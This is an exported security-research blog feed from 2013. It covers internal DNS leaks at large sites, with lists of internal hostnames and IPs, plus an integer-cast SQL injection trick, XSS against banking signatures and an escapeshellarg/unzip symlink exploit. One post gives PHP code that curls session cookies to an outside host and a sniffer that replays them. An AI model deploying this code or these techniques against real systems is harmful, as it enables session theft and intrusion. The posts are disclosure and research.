Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com49tag:blogger.com,1999:blog-7173843122198586393.post-66678209454835268772013-07-02T06:48:00.000-07:002013-08-04T05:18:47.116-07:00Insecure DNS records in top web projects<div dir="ltr" style="text-align: left;" trbidi="on">
Last month ONsec_lab had discovered and reported about the same DNS issue in top web projects: live.com, facebook.com, yahoo.com, nokia.com, paypal.com, baidu.com, att.com and many others.<br />
<div>
<br /></div>
<div>
<div>
DNS linked few *.COMPANY.com domains to IP which doesn't belong to </div>
<div>
COMPANY.</div>
<div>
<br /></div>
<div>
These addressed from Private Address Space 10/8, 172.16/12, 192.168/16 (look at <a href="http://tools.ietf.org/html/rfc1918">http://tools.ietf.org/html/rfc1918</a>, <a href="https://en.wikipedia.org/wiki/IPv4">https://en.wikipedia.org/wiki/IPv4</a>) and localhost 127.0.0.1.</div>
</div>
<div>
<br /></div>
<div>
Basically, this may be interpreted as information leakage from intranet of COMPANY. But it's obvious :)<br />
<br />
This server-side issue can be exploited as a client-side vulnerability when attacker and victim are in the same private network:</div>
<div>
<br /></div>
<div>
I.e. local.COMPANY.com have A-record to 10.0.0.123</div>
<div>
<br /></div>
<div>
<div>
1. Attacker connects to any public network with address space from 10.0.0.0/8 or other which linked to any local.COMPANY.com domain.</div>
<div>
2. Attacker adds to network interface on his computer address from A-record which linked to private address 10.0.0.123.</div>
<div>
3. Attacker publishes on any resource link to local.COMPANY.com (for example - banner on any news-site). Like as classic CSRF/reflected XSS attack.</div>
<div>
4. All users, who connected to the same network (1) and see banner (3) will make request to http://local.COMPANY.com, which actually will be made to computer of attacker. Browser will send cookies for *.COMPAMY.com in this request, because user make request to local.live.com. </div>
<div>
<br /></div>
<div>
In this case malicious user steal cookies.</div>
</div>
<div>
<br /></div>
<div>
What about protection? </div>
<div>
<br /></div>
<div>
Simple way is protect session cookies by Secure flag. This is facebook way. But anyway attacker can steal others non-Secure cookies. Also attacker in this case can do logout attack, because browsers have only 4Kb memory for all cookies which stored at all *.COMPANY.com domains. For this reason attacker can set many new cookies from local.COMPANY.com to delete all cookies from *.COMPANY.com and COMPANY.com scope.</div>
<div>
<br /></div>
<div>
Some examples:</div>
<div>
<br /></div>
<div>
<div>
./ccbill.com:192.168.169.170<span class="Apple-tab-span" style="white-space: pre;"> </span>backend.ccbill.com</div>
<div>
./ccbill.com:192.168.13.127<span class="Apple-tab-span" style="white-space: pre;"> </span>internal.ccbill.com<br />
<br /></div>
<div>
./facebook.com:10.56.0.51<span class="Apple-tab-span" style="white-space: pre;"> </span>atlas.facebook.com</div>
<div>
./facebook.com:10.56.0.69<span class="Apple-tab-span" style="white-space: pre;"> </span>hr.facebook.com</div>
<div>
./facebook.com:10.60.0.29<span class="Apple-tab-span" style="white-space: pre;"> </span>lists.facebook.com</div>
<div>
./facebook.com:10.170.0.4<span class="Apple-tab-span" style="white-space: pre;"> </span>ntp.facebook.com</div>
<div>
./facebook.com:10.78.0.10<span class="Apple-tab-span" style="white-space: pre;"> </span>ntp.facebook.com</div>
<div>
./facebook.com:10.60.0.195<span class="Apple-tab-span" style="white-space: pre;"> </span>sb.facebook.com</div>
<div>
./facebook.com:10.170.0.4<span class="Apple-tab-span" style="white-space: pre;"> </span>time.facebook.com</div>
<div>
./facebook.com:10.78.0.10<span class="Apple-tab-span" style="white-space: pre;"> </span>time.facebook.com</div>
<div>
./facebook.com:10.56.0.7<span class="Apple-tab-span" style="white-space: pre;"> </span>xmail.facebook.com<br />
<br /></div>
<div>
./live.com:10.245.6.27<span class="Apple-tab-span" style="white-space: pre;"> </span>monitoring.live.com<br />
<br /></div>
<div>
./nokia.txt:10.113.1.11<span class="Apple-tab-span" style="white-space: pre;"> </span>guest.nokia.com</div>
<div>
./nokia.txt:172.21.214.214<span class="Apple-tab-span" style="white-space: pre;"> </span>linux.nokia.com</div>
<div>
<br /></div>
<div>
./paypal.com:10.190.3.55<span class="Apple-tab-span" style="white-space: pre;"> </span>mx.paypal.com<br />
<br /></div>
<div>
./yahoo.com:10.72.164.31<span class="Apple-tab-span" style="white-space: pre;"> </span>i.yahoo.com</div>
<div>
./yahoo.com:10.80.80.184<span class="Apple-tab-span" style="white-space: pre;"> </span>na.yahoo.com<br />
<br />
<div>
./baidu.com:10.11.252.74<span class="Apple-tab-span" style="white-space: pre;"> </span>accounts.baidu.com</div>
<div>
./baidu.com:10.81.7.51<span class="Apple-tab-span" style="white-space: pre;"> </span>ba.baidu.com</div>
<div>
./baidu.com:172.18.100.200<span class="Apple-tab-span" style="white-space: pre;"> </span>bd.baidu.com</div>
<div>
./baidu.com:10.36.155.42<span class="Apple-tab-span" style="white-space: pre;"> </span>bh.baidu.com</div>
<div>
./baidu.com:10.36.160.22<span class="Apple-tab-span" style="white-space: pre;"> </span>bh.baidu.com</div>
<div>
./baidu.com:10.38.19.40<span class="Apple-tab-span" style="white-space: pre;"> </span>bh.baidu.com</div>
<div>
./baidu.com:10.42.7.24<span class="Apple-tab-span" style="white-space: pre;"> </span>bi.baidu.com</div>
<div>
./baidu.com:10.44.64.20<span class="Apple-tab-span" style="white-space: pre;"> </span>bugs.baidu.com</div>
<div>
./baidu.com:10.81.11.67<span class="Apple-tab-span" style="white-space: pre;"> </span>cd.baidu.com</div>
<div>
./baidu.com:10.38.157.31<span class="Apple-tab-span" style="white-space: pre;"> </span>cdn.baidu.com</div>
<div>
./baidu.com:10.26.7.93<span class="Apple-tab-span" style="white-space: pre;"> </span>cms.baidu.com</div>
<div>
./baidu.com:10.26.137.29<span class="Apple-tab-span" style="white-space: pre;"> </span>com.baidu.com</div>
<div>
./baidu.com:10.36.7.99<span class="Apple-tab-span" style="white-space: pre;"> </span>crm.baidu.com</div>
<div>
./baidu.com:10.26.7.125<span class="Apple-tab-span" style="white-space: pre;"> </span>crm.baidu.com</div>
<div>
./baidu.com:10.23.248.28<span class="Apple-tab-span" style="white-space: pre;"> </span>ct.baidu.com</div>
<div>
./baidu.com:10.42.243.12<span class="Apple-tab-span" style="white-space: pre;"> </span>dc.baidu.com</div>
<div>
./baidu.com:10.237.2.83<span class="Apple-tab-span" style="white-space: pre;"> </span>def.baidu.com</div>
<div>
./baidu.com:10.65.211.94<span class="Apple-tab-span" style="white-space: pre;"> </span>dt.baidu.com</div>
<div>
./baidu.com:172.18.0.180<span class="Apple-tab-span" style="white-space: pre;"> </span>ecom.baidu.com</div>
<div>
./baidu.com:10.42.7.18<span class="Apple-tab-span" style="white-space: pre;"> </span>erp.baidu.com</div>
<div>
./baidu.com:10.42.224.22<span class="Apple-tab-span" style="white-space: pre;"> </span>flow.baidu.com</div>
<div>
./baidu.com:172.22.1.88<span class="Apple-tab-span" style="white-space: pre;"> </span>fw.baidu.com</div>
<div>
./baidu.com:172.22.31.92<span class="Apple-tab-span" style="white-space: pre;"> </span>ga.baidu.com</div>
<div>
./baidu.com:10.46.52.12<span class="Apple-tab-span" style="white-space: pre;"> </span>global.baidu.com</div>
<div>
./baidu.com:10.42.58.42<span class="Apple-tab-span" style="white-space: pre;"> </span>global.baidu.com</div>
<div>
./baidu.com:172.16.1.2<span class="Apple-tab-span" style="white-space: pre;"> </span>gw1.baidu.com</div>
<div>
./baidu.com:10.240.31.12<span class="Apple-tab-span" style="white-space: pre;"> </span>h.baidu.com</div>
<div>
./baidu.com:10.81.12.102<span class="Apple-tab-span" style="white-space: pre;"> </span>iq.baidu.com</div>
<div>
./baidu.com:10.42.7.203<span class="Apple-tab-span" style="white-space: pre;"> </span>it.baidu.com</div>
<div>
./baidu.com:10.42.7.54<span class="Apple-tab-span" style="white-space: pre;"> </span>km.baidu.com</div>
<div>
./baidu.com:10.23.249.173<span class="Apple-tab-span" style="white-space: pre;"> </span>kr.baidu.com</div>
<div>
./baidu.com:10.65.18.107<span class="Apple-tab-span" style="white-space: pre;"> </span>launch.baidu.com</div>
<div>
./baidu.com:10.36.23.62<span class="Apple-tab-span" style="white-space: pre;"> </span>live.baidu.com</div>
<div>
./baidu.com:10.26.40.19<span class="Apple-tab-span" style="white-space: pre;"> </span>live.baidu.com</div>
<div>
./baidu.com:10.81.45.245<span class="Apple-tab-span" style="white-space: pre;"> </span>log.baidu.com</div>
<div>
./baidu.com:10.26.39.14<span class="Apple-tab-span" style="white-space: pre;"> </span>log.baidu.com</div>
<div>
./baidu.com:10.23.65.13<span class="Apple-tab-span" style="white-space: pre;"> </span>log02.baidu.com</div>
<div>
./baidu.com:10.11.250.228<span class="Apple-tab-span" style="white-space: pre;"> </span>mirror.baidu.com</div>
<div>
./baidu.com:10.26.140.39<span class="Apple-tab-span" style="white-space: pre;"> </span>ml.baidu.com</div>
<div>
./baidu.com:10.81.15.138<span class="Apple-tab-span" style="white-space: pre;"> </span>monitor.baidu.com</div>
<div>
./baidu.com:10.42.7.232<span class="Apple-tab-span" style="white-space: pre;"> </span>nl.baidu.com</div>
<div>
./baidu.com:10.240.31.12<span class="Apple-tab-span" style="white-space: pre;"> </span>o.baidu.com</div>
<div>
./baidu.com:10.26.3.48<span class="Apple-tab-span" style="white-space: pre;"> </span>ocean.baidu.com</div>
<div>
./baidu.com:10.23.240.246<span class="Apple-tab-span" style="white-space: pre;"> </span>openview.baidu.com</div>
<div>
./baidu.com:10.23.65.19<span class="Apple-tab-span" style="white-space: pre;"> </span>pe.baidu.com</div>
<div>
./baidu.com:172.22.1.82<span class="Apple-tab-span" style="white-space: pre;"> </span>portal.baidu.com</div>
<div>
./baidu.com:10.11.0.12<span class="Apple-tab-span" style="white-space: pre;"> </span>r2.baidu.com</div>
<div>
./baidu.com:10.32.10.74<span class="Apple-tab-span" style="white-space: pre;"> </span>ra.baidu.com</div>
<div>
./baidu.com:10.44.31.17<span class="Apple-tab-span" style="white-space: pre;"> </span>se.baidu.com</div>
<div>
./baidu.com:10.42.7.217<span class="Apple-tab-span" style="white-space: pre;"> </span>security.baidu.com</div>
<div>
./baidu.com:10.65.25.83<span class="Apple-tab-span" style="white-space: pre;"> </span>serv.baidu.com</div>
<div>
./baidu.com:10.26.52.14<span class="Apple-tab-span" style="white-space: pre;"> </span>sms.baidu.com</div>
<div>
./baidu.com:10.65.18.22<span class="Apple-tab-span" style="white-space: pre;"> </span>speed.baidu.com</div>
<div>
./baidu.com:10.42.7.217<span class="Apple-tab-span" style="white-space: pre;"> </span>ssl.baidu.com</div>
<div>
./baidu.com:10.46.28.36<span class="Apple-tab-span" style="white-space: pre;"> </span>tiger.baidu.com</div>
<div>
./baidu.com:10.44.66.5<span class="Apple-tab-span" style="white-space: pre;"> </span>tn.baidu.com</div>
<div>
./baidu.com:10.81.11.241<span class="Apple-tab-span" style="white-space: pre;"> </span>tool.baidu.com</div>
<div>
./baidu.com:10.81.11.241<span class="Apple-tab-span" style="white-space: pre;"> </span>tools.baidu.com</div>
<div>
./baidu.com:10.23.1.162<span class="Apple-tab-span" style="white-space: pre;"> </span>training.baidu.com</div>
<div>
./baidu.com:10.23.248.87<span class="Apple-tab-span" style="white-space: pre;"> </span>ut.baidu.com</div>
<div>
./baidu.com:10.48.40.58<span class="Apple-tab-span" style="white-space: pre;"> </span>va.baidu.com</div>
<div>
./baidu.com:10.48.30.87<span class="Apple-tab-span" style="white-space: pre;"> </span>web.baidu.com</div>
<div>
./baidu.com:10.65.19.212<span class="Apple-tab-span" style="white-space: pre;"> </span>win.baidu.com</div>
<div>
./baidu.com:10.42.8.38<span class="Apple-tab-span" style="white-space: pre;"> </span>work.baidu.com</div>
<div>
./baidu.com:10.81.211.74<span class="Apple-tab-span" style="white-space: pre;"> </span>ws.baidu.com</div>
</div>
</div>
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com92tag:blogger.com,1999:blog-7173843122198586393.post-41400879627439773182013-05-13T12:47:00.000-07:002013-05-13T12:47:06.243-07:00When Integer cannot protect you from SQL injection?<div dir="ltr" style="text-align: left;" trbidi="on">
It is assumed that the cast user data to a numeric type is fully protected from SQL injection vulnerabilities.<br />
<br />
Look at simple example:<br />
<br />
<pre style="background-color: white; color: #3b3b3b; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><span style="color: #0053ff; font-weight: 700;">$action</span> <span style="color: #006699; font-weight: 700;">=</span> <span style="color: #0053ff; font-weight: 700;">$_GET</span>[<span style="color: #666666;">'do'</span>];
<span style="color: #0053ff; font-weight: 700;">$r</span><span style="color: #006699; font-weight: 700;">=</span><span style="color: #0053ff; font-weight: 700;">$db</span><span style="color: #006699; font-weight: 700;">-></span>query(<span style="color: #666666;">"select role"</span><span style="color: #006699; font-weight: 700;">.</span>((<span style="color: #ff5600;">int</span>)<span style="color: #0053ff; font-weight: 700;">$action</span>)<span style="color: #006699; font-weight: 700;">.</span><span style="color: #666666;">" from users where id="</span><span style="color: #006699; font-weight: 700;">.</span>((<span style="color: #ff5600;">int</span>)<span style="color: #0053ff; font-weight: 700;">$_SESSION</span>[<span style="color: #666666;">'user_id'</span>]));
<span style="color: #006699; font-weight: 700;">if</span>(<span style="color: #0053ff; font-weight: 700;">$row</span><span style="color: #006699; font-weight: 700;">=</span><span style="color: #0053ff; font-weight: 700;">$r</span><span style="color: #006699; font-weight: 700;">-></span>fetchArray()){
<span style="color: #006699; font-weight: 700;"> if</span>((<span style="color: #ff5600;">int</span>)<span style="color: #0053ff; font-weight: 700;">$row</span>[<span style="color: #a8017e;">0</span>]<span style="color: #006699; font-weight: 700;">!</span><span style="color: #006699; font-weight: 700;">==</span><span style="color: #a8017e;">1</span>){
<span style="color: #006699; font-weight: 700;"> die</span>(<span style="color: #666666;">'permission denied'</span>);
}<span style="color: #006699; font-weight: 700;">else</span>{
doAction(<span style="color: #0053ff; font-weight: 700;">$action</span>);
}
}</pre>
<br />
<br />
This code looks like SQLi protected, but it is not true.<br />
<br />
Do not forget two obvious facts:<br />
1. Minus is SQL operatator<br />
2. Numbers can be negative<br />
<br />
Now its easy to understand SQL logic in this case (w/o injection):<br />
<br />
<pre style="background-color: white; color: #3b3b3b; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><span style="color: #006699; font-weight: 700;">select</span> role0 <span style="color: #006699; font-weight: 700;">from</span> users <span style="color: #006699; font-weight: 700;">where</span> id<span style="color: #006699; font-weight: 700;">=</span><span style="color: #a8017e;">0</span></pre>
<br />
And SQL injection attack vector in this case:<br />
<br />
<pre style="background-color: white; color: #3b3b3b; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><span style="color: #006699; font-weight: 700;">select</span> role<span style="color: #006699; font-weight: 700;">-</span><span style="color: #a8017e;">1</span> <span style="color: #006699; font-weight: 700;">from</span> users <span style="color: #006699; font-weight: 700;">where</span> id<span style="color: #006699; font-weight: 700;">=</span><span style="color: #a8017e;">0</span></pre>
<br />
<br />
In our example attacker can bypass auth.<br />
This example requires tables <span style="background-color: white; color: #3b3b3b; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em;">role </span>and <span style="background-color: white; color: #3b3b3b; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em;">role0</span> both in database.</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com30tag:blogger.com,1999:blog-7173843122198586393.post-51436414415419692222013-04-24T07:25:00.002-07:002013-04-24T07:25:36.302-07:00How XSS can defeat your digital signatures<div dir="ltr" style="text-align: left;" trbidi="on">
Recently we exploited nice XSS vector in one of RBS (Remote Banking Service) system. This example shows very well how dangerous can be client-attack.<br />
<br />
Client after the authorization could sign electronic documents.<br />
For signature from browser developers used <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa375732(v=vs.85).aspx">CAPICOM</a> technology.<br />
<br />
If you are already understood us, you can not finish this note ;)<br />
<br />
Signature from JavaScript - this is easy and usefull from client-side attacks.<br />
JS code for sign document looks like:<br />
<br />
<br />
<br />
<pre><span style="color: maroon; font-weight: bold;">function</span> SignCreate<span style="color: #808030;">(</span>certSubjectName<span style="color: #808030;">,</span> <b><span style="color: red;">dataToSign</span></b><span style="color: #808030;">)</span> <span style="color: purple;">{</span>
<span style="color: maroon; font-weight: bold;">var</span> oStore <span style="color: #808030;">=</span> CreateObject<span style="color: #808030;">(</span><span style="color: maroon;">"</span><span style="color: #0000e6;">CAPICOM.Store</span><span style="color: maroon;">"</span><span style="color: #808030;">)</span><span style="color: purple;">;</span>
oStore<span style="color: #808030;">.</span>Open<span style="color: #808030;">(</span>CAPICOM_CURRENT_USER_STORE<span style="color: #808030;">,</span> CAPICOM_MY_STORE<span style="color: #808030;">,</span>
CAPICOM_STORE_OPEN_MAXIMUM_ALLOWED<span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">var</span> oCertificates <span style="color: #808030;">=</span> oStore<span style="color: #808030;">.</span>Certificates<span style="color: #808030;">.</span>Find<span style="color: #808030;">(</span>
CAPICOM_CERTIFICATE_FIND_SUBJECT_NAME<span style="color: #808030;">,</span> certSubjectName<span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">if</span> <span style="color: #808030;">(</span>oCertificates<span style="color: #808030;">.</span>Count <span style="color: #808030;">==</span> <span style="color: #008c00;">0</span><span style="color: #808030;">)</span> <span style="color: purple;">{</span>
alert<span style="color: #808030;">(</span><span style="color: maroon;">"</span><span style="color: #0000e6;">Certificate not found: </span><span style="color: maroon;">"</span> <span style="color: #808030;">+</span> certSubjectName<span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">return</span><span style="color: purple;">;</span>
<span style="color: purple;">}</span></pre>
<pre><span style="color: purple;"> ...</span></pre>
<br />
<br />
You can easily call this function from stored/reflected XSS to sign arbitrary data.<br />
To solve the PIN entry problem, we have used the caching mechanism for the key. Most often, after entering the PIN code of the key, PIN is remembered for a while.<br />
<br />
So we were able to sign arbitrary (injected) document immediately after the user signs his own document (and entered PIN of course).<br />
<br />
Then, using the Javascript we were able to hide the injected signed document from users's orders table (document was order request) for current user.<br />
<br />
So only a single stored XSS vulnerability defeated all security measures of the RBS system. Note, that typically protections such as httpOnly cookies and SSL have been included, but it does not help.<br />
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com31tag:blogger.com,1999:blog-7173843122198586393.post-78951702944067782532013-04-08T02:49:00.002-07:002013-04-08T02:49:50.392-07:00Exploiting server-side vulns as client-side?!!<div dir="ltr" style="text-align: left;" trbidi="on">
Sounds terrible, does not it? This post is obviously of course ;)<br />
<br />
But sometimes this is effective attack vector, for example, whenever you can exploit any subdomain (news.your-target.com) but can not exploit main domain (your-target.com).<br />
<br />
You can track cookies at any subdomain even if they were protected by httpOnly/Security.<br />
Look to RFC6265 <a href="http://tools.ietf.org/html/rfc6265">http://tools.ietf.org/html/rfc6265</a>:<br />
<br />
<pre class="newpage" style="font-size: 1em; page-break-before: always;"><span class="h5" style="display: inline; font-size: 1em; font-weight: bold; line-height: 0pt;"><h5 style="display: inline; font-size: 1em; line-height: 0pt;">
<a class="selflink" href="http://tools.ietf.org/html/rfc6265#section-4.1.2.3" name="section-4.1.2.3" style="color: black; text-decoration: none;">4.1.2.3</a>. The Domain Attribute</h5>
</span>
The Domain attribute specifies those hosts to which the cookie will
be sent. For example, if the value of the Domain attribute is
"example.com", the user agent will include the cookie in the Cookie
header when making HTTP requests to example.com, www.example.com, and
www.corp.example.com. (Note that a leading %x2E ("."), if present,
is ignored even though that character is not permitted, but a
trailing %x2E ("."), if present, will cause the user agent to ignore
the attribute.) If the server omits the Domain attribute, the user
agent will return the cookie only to the origin server.</pre>
<pre class="newpage" style="font-size: 1em; page-break-before: always;"></pre>
<pre class="newpage" style="font-size: 1em; page-break-before: always;"><div style="font-family: Times; font-size: medium; white-space: normal;">
Tracking cookies are possible when main server sending Set-cookie header with "domain" attribute.<br />
Logger to inject into subdomain may looks like:<br />
<pre style="background-color: white; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><?php
<span style="color: #0100b6; font-weight: 700;">if</span>(<span style="color: #0100b6; font-weight: 700;">!</span><span style="color: #3c4c72; font-weight: 700;">isset</span>(<span style="color: #0206ff; font-style: italic;">$_COOKIE</span>[<span style="color: #d80800;">'session_id'</span>]) <span style="color: #0100b6; font-weight: 700;">||</span> <span style="color: #0100b6; font-weight: 700;">!</span><span style="color: #3c4c72; font-weight: 700;">preg_match</span>(<span style="color: #d80800;">'/<span style="color: #0100b6; font-weight: 700;">$</span>ASYOUWANT<span style="color: #0100b6; font-weight: 700;">^</span>/s'</span>,<span style="color: #0206ff; font-style: italic;">$_COOKIE</span>[<span style="color: #d80800;">'session_id'</span>]) <span style="color: #0100b6; font-weight: 700;">||</span> <span style="color: #3c4c72; font-weight: 700;">isset</span>(<span style="color: #0206ff; font-style: italic;">$_SESSION</span>[<span style="color: #d80800;">'already_logged'</span>])){
<span style="color: #00b418;">//do nothing</span>
}<span style="color: #0100b6; font-weight: 700;">else</span>{
<span style="color: #00b418;">//exec called for asynchronous request</span>
<span style="color: #3c4c72; font-weight: 700;">exec</span>(<span style="color: #d80800;">"curl http://security-auditor.com/sniffer.php?session_id="</span><span style="color: #0100b6; font-weight: 700;">.</span><span style="color: #0206ff; font-style: italic;">$_COOKIE</span>[<span style="color: #d80800;">'session_id'</span>])<span style="color: #0100b6; font-weight: 700;">.</span><span style="color: #d80800;">" &"</span>;<span style="color: #00b418;">//httpOnly cookie of course</span>
<span style="color: #0206ff; font-style: italic;">$_SESSION</span>[<span style="color: #d80800;">'already_logged'</span>]<span style="color: #0100b6; font-weight: 700;">=</span><span style="color: #585cf6; font-style: italic;">true</span>;
}
?></pre>
Simple code of described sniffer listed below:
<br />
<pre style="background-color: white; font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><pre style="font-family: Consolas, 'Lucida Console', 'DejaVu Sans Mono', Monaco, 'Courier New', monospace; font-size: 0.9333em; line-height: 1.5em; padding: 4px;"><?php
<span style="color: #0206ff; font-style: italic;">$ssid</span> <span style="color: #0100b6; font-weight: 700;">=</span> <span style="color: #0100b6; font-weight: 700;">@</span><span style="color: #0206ff; font-style: italic;">$_GET</span>[<span style="color: #d80800;">'session_id'</span>];
<span style="color: #0100b6; font-weight: 700;">if</span>(<span style="color: #0206ff; font-style: italic;">$ssid</span><span style="color: #0100b6; font-weight: 700;">!</span><span style="color: #0100b6; font-weight: 700;">=</span><span style="color: #d80800;">""</span>){
<span style="color: #00b418;">// download page as a client</span>
<span style="color: #0206ff; font-style: italic;">$opts</span> <span style="color: #0100b6; font-weight: 700;">=</span> <span style="color: #3c4c72; font-weight: 700;">array</span>(
<span style="color: #d80800;">'http'</span><span style="color: #0100b6; font-weight: 700;">=></span><span style="color: #3c4c72; font-weight: 700;">array</span>(
<span style="color: #d80800;">'method'</span><span style="color: #0100b6; font-weight: 700;">=></span><span style="color: #d80800;">"GET"</span>,
<span style="color: #d80800;">'header'</span><span style="color: #0100b6; font-weight: 700;">=></span><span style="color: #d80800;">"Accept-language: en<span style="color: #26b31a;">\r</span><span style="color: #26b31a;">\n</span>"</span> <span style="color: #0100b6; font-weight: 700;">.</span>
<span style="color: #d80800;">"Cookie: session_id=<span style="color: #0206ff; font-style: italic;">$ssid</span>;<span style="color: #26b31a;">\r</span><span style="color: #26b31a;">\n</span>"</span>
)
);
<span style="color: #0206ff; font-style: italic;">$context</span> <span style="color: #0100b6; font-weight: 700;">=</span> <span style="color: #3c4c72; font-weight: 700;">stream_context_create</span>(<span style="color: #0206ff; font-style: italic;">$opts</span>);
<span style="color: #0206ff; font-style: italic;">$file</span> <span style="color: #0100b6; font-weight: 700;">=</span> <span style="color: #3c4c72; font-weight: 700;">file_get_contents</span>(<span style="color: #d80800;">'https://target.com/settings'</span>, <span style="color: #585cf6; font-style: italic;">false</span>, <span style="color: #0206ff; font-style: italic;">$context</span>);
<span style="color: #0100b6; font-weight: 700;"> if</span>(<span style="color: #0100b6; font-weight: 700;">!</span><span style="color: #3c4c72; font-weight: 700;">file_exists</span>(<span style="color: #d80800;">"/tmp/sess-<span style="color: #0206ff; font-style: italic;">$ssid</span>"</span>)){
<span style="color: #3c4c72; font-weight: 700;">file_put_contents</span>(<span style="color: #d80800;">"/tmp/sess-<span style="color: #0206ff; font-style: italic;">$ssid</span>"</span>,<span style="color: #d80800;">"Cookie: session_id=<span style="color: #0206ff; font-style: italic;">$ssid</span>; <span style="color: #26b31a;">\n</span>"</span><span style="color: #0100b6; font-weight: 700;">.</span><span style="color: #0206ff; font-style: italic;">$file</span> ); } }
?></pre>
</pre>
</div>
</pre>
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com28tag:blogger.com,1999:blog-7173843122198586393.post-35815921052569934032013-03-24T12:28:00.002-07:002013-03-24T12:31:24.503-07:00Breaking escapeshellarg() news<div dir="ltr" style="text-align: left;" trbidi="on">
PHP function <a href="http://php.net/manual/en/function.escapeshellarg.php">escapeshellarg()</a> is the most popular way to prevent <a href="http://projects.webappsec.org/w/page/13246950/OS%20Commanding">OS Commanding</a> threats during shell calls by escaping command arguments.<br />
<br />
But this function is not a panacea, and you should keep this in mind when using it.<br />
<br />
Let's try to understand what this escaping function is doing:<br />
<ol style="text-align: left;">
<li>Performs framing quotes string: aaa -> 'aaa'</li>
<li>Cuts bytes 0x00, 0x80-0xFF</li>
<li>Escape single quotes: ' -> ''\'''</li>
</ol>
This guaranteed to create one console line argument from a string.<br />
So, looks like ideal solution, right?<br />
<br />
But there are no restrictions on characters in this line argument. For example, command line argument after escapeshellarg() filtration <b><span style="color: red;">can be a command key</span></b> (-a, -o and others). <b>This is the first trick.</b><br />
<br />
<b>Second trick</b> is argument parser which embeded in command line utilities.<br />
<br />
Feel it:<br />
$command -arg param<br />
$command -arg=param<br />
<span style="color: red;"><b>$command '-arg=param'</b></span><br />
<span style="color: red;"><b>$command '-arg param'</b></span><br />
<br />
There are no differences between these four examples for most command line utilities! Pay your attention to two last command lines, - you can put these lines after escapeshellarg() filtration.<br />
<br />
<b>Example:</b><br />
<pre><?php
exec('unzip -j '.escapeshellarg($_GET['zip_arch_name']).' *.dat -d /tmp');
?></pre>
Is it code protected from hackers? Try to check this in terminal by typing:<br />
<b>$ unzip -j <span style="color: red;">'-d/var/www/'</span> *.dat -d /tmp</b><br />
<br />
This command will extract files with masks '*.dat' (all matches after first), '-d', '/tmp' from ZIP arhieve with filename *.dat to output folder /var/www.<br />
<br />
Preparing exploit:<br />
$ ln -s /etc/hosts 2.dat<br />
$ zip --symlinks 1.zip 2.dat<br />
$ mv 1.zip 1.dat<br />
<br />
You can also add file with name '-d' to archive to make attack more stable (w/o needs of upload 1.dat and 2.dat both for exploit).<br />
<br />
Try it:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho-Jd5zzWAMQGmwy-gX-tXBguRZYM992dK-MkUiRY1znRY6F7p1UcwTCYfylAJ6ujIhHTk7hWnnJ46AZWTUQwBdDwKN2UbJ76O01t05xMSP9nbAABQyFi1_dje_gKoV74sI-eHxB-0gyY/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA+%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0+2013-03-24+%25D0%25B2+23.10.29.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho-Jd5zzWAMQGmwy-gX-tXBguRZYM992dK-MkUiRY1znRY6F7p1UcwTCYfylAJ6ujIhHTk7hWnnJ46AZWTUQwBdDwKN2UbJ76O01t05xMSP9nbAABQyFi1_dje_gKoV74sI-eHxB-0gyY/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA+%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0+2013-03-24+%25D0%25B2+23.10.29.png" /></a></div>
$ unzip -j '-d/var/www' *.dat -d /tmp<br />
Archive: 1.dat<br />
linking: /var/www/2.dat -> /etc/hosts<br />
finishing deferred symbolic links:<br />
/var/www/2.dat -> /etc/hosts<br />
caution: filename not matched: -d<br />
caution: filename not matched: /tmp<br />
<br />
Now you can read files by +FollowSymlinks --------------></div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com23tag:blogger.com,1999:blog-7173843122198586393.post-45859544033282020652013-03-05T15:07:00.000-08:002013-03-06T04:01:09.952-08:00Analysis of CVE-2013-1048<div dir="ltr" style="text-align: left;" trbidi="on">
Today we were very surprised by vulnerability CVE-2013-1048 in Apache web-server. This issue was described in <a href="http://www.debian.org/security/2013/dsa-2637">Debian Security Advisory DSA-2637-1</a> by following notes:<br />
<br />
<blockquote class="tr_bq">
Hayawardh Vijayakumar noticed that the apache2ctl script created the lock directory in an unsafe manner, allowing a local attacker to gain elevated privileges via a symlink attack. This is a Debian specific issue.</blockquote>
First looks at last line of quote - only Debian systems were affected.<br />
<br />
